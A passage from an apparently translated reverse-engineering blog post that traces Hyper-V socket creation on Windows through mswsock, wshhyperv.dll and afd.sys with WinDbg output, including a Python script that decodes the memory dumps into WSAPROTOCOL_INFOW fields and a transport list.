<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The following values are returned:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dc @ebx – (ebx holds the pointer to the memory block passed to mswsock!SockLoadTransportList)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224ee0 006d0076 00750062 00000073 00730050 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">v.m.b.u.s</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">...P.s.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224ef0 00680063 00640065 00540000 00700063 c.h.e.d...T.c.p.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224f00 00700069 00540000 00700063 00700069 i.p...T.c.p.i.p.</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01224f10 00000036 abab0000 abababab feeeabab 6..............</span></div>
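<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The two dc dumps above (the catalog entry passed to DPROVIDER::Initialize and the Transports list) are easier to read once the raw dwords are decoded. The script below is an added example written for this article, not code from the post or from Microsoft: it rebuilds the bytes from the WinDbg dc text, interprets the first dump as the 32-bit WSAPROTOCOL_INFOW layout (my reading of what DPROVIDER::Initialize receives from the catalog entry; the field layout is the public winsock2.h one) and the second as a REG_MULTI_SZ list. The constants AF_HYPERV = 34 and HV_PROTOCOL_RAW = 1 come from hvsocket.h, the XP1_* bits from winsock2.h; the dump text is embedded verbatim from the post as constructed sample input so that the script runs offline.</span></div>

```python
import struct
import uuid

# Constructed sample input: the two WinDbg `dc` dumps from the post, copied
# verbatim so the script runs offline without a debugger session.
PROTOCOL_INFO_DUMP = """\
0122b48c 00020026 00000000 00000000 00000000 &...............
0122b49c 00000008 1234191b 4ca74bf7 d7dfe086 ......4..K.L....
0122b4ac 45542bc3 000003e9 00000001 00000000 .+TE............
0122b4bc 00000000 00000000 00000000 00000000 ................
0122b4cc 00000000 00000000 00000002 00000022 ............"...
0122b4dc 00000024 00000024 00000001 00000001 $...$...........
0122b4ec 00000000 00000000 00000000 00000000 ................
0122b4fc 00000000 00790048 00650070 002d0072 ....H.y.p.e.r.-.
0122b50c 00200056 00410052 00000057 00000000 V. .R.A.W.......
0122b51c 00000000 00000000 00000000 00000000 ................
"""

TRANSPORTS_DUMP = """\
01224ee0 006d0076 00750062 00000073 00730050 v.m.b.u.s...P.s.
01224ef0 00680063 00640065 00540000 00700063 c.h.e.d...T.c.p.
01224f00 00700069 00540000 00700063 00700069 i.p...T.c.p.i.p.
01224f10 00000036 abab0000 abababab feeeabab 6..............
"""

# Public constants: hvsocket.h (AF_HYPERV, HV_PROTOCOL_RAW) and winsock2.h (XP1_*).
AF_HYPERV = 34
HV_PROTOCOL_RAW = 1
XP1_FLAGS = {
    0x00000001: "XP1_CONNECTIONLESS",
    0x00000002: "XP1_GUARANTEED_DELIVERY",
    0x00000004: "XP1_GUARANTEED_ORDER",
    0x00000008: "XP1_MESSAGE_ORIENTED",
    0x00000010: "XP1_PSEUDO_STREAM",
    0x00000020: "XP1_GRACEFUL_CLOSE",
    0x00020000: "XP1_IFS_HANDLES",
}

HEX = set("0123456789abcdefABCDEF")


def dc_to_bytes(dump: str) -> bytes:
    """Rebuild raw little-endian memory from `dc` output.

    Each line is: <address> <up to four dwords> <ASCII column>. Only the
    dword columns are used; the ASCII column is skipped."""
    out = bytearray()
    for line in dump.splitlines():
        fields = line.split()
        for word in fields[1:5]:
            if len(word) != 8 or not set(word) <= HEX:
                break  # short final line: reached the ASCII column
            out += struct.pack("<I", int(word, 16))
    return bytes(out)


def parse_wsaprotocol_infow(buf: bytes) -> dict:
    """Decode the 32-bit WSAPROTOCOL_INFOW layout from the catalog entry."""
    # dwServiceFlags1..4, dwProviderFlags, ProviderId, dwCatalogEntryId,
    # ProtocolChain (ChainLen + 7 entries), iVersion..iSecurityScheme,
    # dwMessageSize, dwProviderReserved; szProtocol[256] (WCHAR) follows.
    fixed = "<5I16sI8i9iII"
    size = struct.calcsize(fixed)  # 0x74 bytes
    f = struct.unpack(fixed, buf[:size])
    name = buf[size:size + 512].decode("utf-16-le", errors="replace")
    flags1 = f[0]
    return {
        "dwServiceFlags1": flags1,
        "ServiceFlags1Names": [n for bit, n in XP1_FLAGS.items() if flags1 & bit],
        "dwProviderFlags": f[4],
        "ProviderId": str(uuid.UUID(bytes_le=f[5])),  # GUID is stored little-endian
        "dwCatalogEntryId": f[6],
        "ChainLen": f[7],
        "iVersion": f[15],
        "iAddressFamily": f[16],
        "iMaxSockAddr": f[17],
        "iMinSockAddr": f[18],
        "iSocketType": f[19],
        "iProtocol": f[20],
        "szProtocol": name.split("\x00", 1)[0],
        "is_hyperv_raw": f[16] == AF_HYPERV and f[20] == HV_PROTOCOL_RAW,
    }


def parse_multi_sz(buf: bytes) -> list:
    """Decode a REG_MULTI_SZ blob: UTF-16LE strings, each NUL-terminated,
    the list ended by an empty string. Stops at the double NUL so the heap
    fill pattern after the buffer (abab.../feee...) is not read as data."""
    names = []
    for item in buf.decode("utf-16-le", errors="replace").split("\x00"):
        if item == "":
            break
        names.append(item)
    return names


if __name__ == "__main__":
    info = parse_wsaprotocol_infow(dc_to_bytes(PROTOCOL_INFO_DUMP))
    for key, value in info.items():
        print(f"{key:22} {value}")
    print("Transports:", parse_multi_sz(dc_to_bytes(TRANSPORTS_DUMP)))
```

<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Decoded this way, the first dump gives ProviderId {1234191B-4BF7-4CA7-86E0-DFD7C32B5445}, catalog entry 1001, iAddressFamily 34 (AF_HYPERV), iMaxSockAddr/iMinSockAddr 36 (the size of SOCKADDR_HV), iSocketType 1 (SOCK_STREAM), iProtocol 1 (HV_PROTOCOL_RAW) and the name "Hyper-V RAW", i.e. exactly the provider that netsh listed; the second dump gives the transport list vmbus, Psched, Tcpip, Tcpip6, which is why the vmbus entry is the one whose HelperDllName is consulted next.</span></div>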
<br /><br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mswsock!SockLoadHelperDll is called, the HKLM\System\CurrentControlSet\Services\vmbus\Parameters\Winsock\HelperDllName value is read, and the C:\Windows\SysWoW64\wshhyperv.dll library is loaded (the ServerExample is compiled as 32-bit, so the SysWoW64 copy is used).</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">mswsock!SockGetTdiName returns the address of wshhyperv!WSHOpenSocket2. This function only validates the socket parameters passed to it.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="142" src="https://lh5.googleusercontent.com/1nztH-EuHVT0yqO1qeIlzVqJRwgKY2pkIyDQbIGyDYrLHyVDoXB0qwSDHJ9Rp8blAqUYu_XVE40B34YHYqjtZkKKoRLjwF_JJxwYy0r9PspChdIGs-IlEMhCqyzvKe7uSgWEDY1MyaWfwWL2Gg" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="330" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, GetCurrentProcess and OpenProcessToken are called in sequence, followed by GetTokenInformation. The _TOKEN_INFORMATION_CLASS passed to it is 0x1D:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dt _TOKEN_INFORMATION_CLASS @esp+8</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">combase!_TOKEN_INFORMATION_CLASS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">1d ( TokenIsAppContainer ) – probably to support sockets inside Docker containers, or applications compiled with the Visual Studio /APPCONTAINER linker option</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The result is stored in the variable mswsock!SockIsAppContainer. Next we see the initialization of the \\Device\\Afd\\Endpoint string, which is passed to ntdll!NtCreateFile:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx OBJECT_ATTRIBUTES poi(@esp+0x8) (the 3rd parameter of ntdll!NtCreateFile)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((OBJECT_ATTRIBUTES *)0xf6f348)) [Type: OBJECT_ATTRIBUTES]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Length : 0x18 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x004] RootDirectory : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x008] ObjectName : 0xf6f33c : "\Device\Afd\Endpoint" [Type: _UNICODE_STRING *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x00c] Attributes : 0x42 [Type: unsigned long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x010] SecurityDescriptor : 0x0 [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x014] SecurityQualityOfService : 0x0 [Type: void *]</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>dtx _IO_STATUS_BLOCK @esp+0xc -r (the 4th parameter of ntdll!NtCreateFile) </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">(*((_IO_STATUS_BLOCK *)0xf6f30c)) [Type: _IO_STATUS_BLOCK] – the structure is not initialized yet</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Status : 16184168 [Type: long]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x000] Pointer : </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0xf6f368</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [Type: void *]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> [+0x004] Information : 0x0 [Type: unsigned long] – after the call this field receives the result of the operation (FILE_CREATED, FILE_OPENED, FILE_OVERWRITTEN, FILE_SUPERSEDED, FILE_EXISTS, FILE_DOES_NOT_EXIST)</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Execution then passes into the kernel, to the afd.sys driver. At initialization this driver registers the following IRP handlers:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!drvobj afd 2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Driver object (ffffda8527de19c0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> \Driver\AFD</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DriverEntry: fffff803db38a000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!GsDriverEntry</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DriverStartIo: 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">DriverUnload: fffff803db34c380</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdUnload</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">AddDevice: 00000000</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dispatch routines:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[00] IRP_MJ_CREATE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[01] IRP_MJ_CREATE_NAMED_PIPE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[02] IRP_MJ_CLOSE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">[03] IRP_MJ_READ</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">[04] IRP_MJ_WRITE fffff803db357e90</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdDispatch</span></div>
<br /><br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>kn</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"># Child-SP RetAddr Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 afd!AfdDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 nt!IopParseDevice+0x1655</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 nt!ObpLookupObjectName+0x8b2</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 nt!ObOpenObjectByNameEx+0x1dd</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 nt!IopCreateFile+0x3d9</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 nt!NtCreateFile+0x79</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 nt!KiSystemServiceCopyEnd+0x13</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">ntdll!NtCreateFile</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">+0x14</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Accordingly, after our program calls ntdll!NtCreateFile, execution reaches afd!AfdDispatch. Its first parameter is the device object:</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devobj @rcx</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device object (ffffda8527de29d0) is for:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Afd \Driver\AFD DriverObject ffffda8527de19c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Current Irp 00000000 RefCount 79 Type 00000011 Flags 00000050</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Dacl ffffcb8a7e8ccd11 DevExt 00000000 DevObjExt ffffda8527de2b20 </span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Characteristics (0x00020000) FILE_DEVICE_ALLOW_APPCONTAINER_TRAVERSAL</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Device queue is not busy.</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">WINDBG>!devstack ffffda8527de29d0 – only one device in the stack</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> !DevObj !DrvObj !DevExt ObjectName</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">> ffffda8527de29d0 \Driver\AFD 00000000 Afd</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
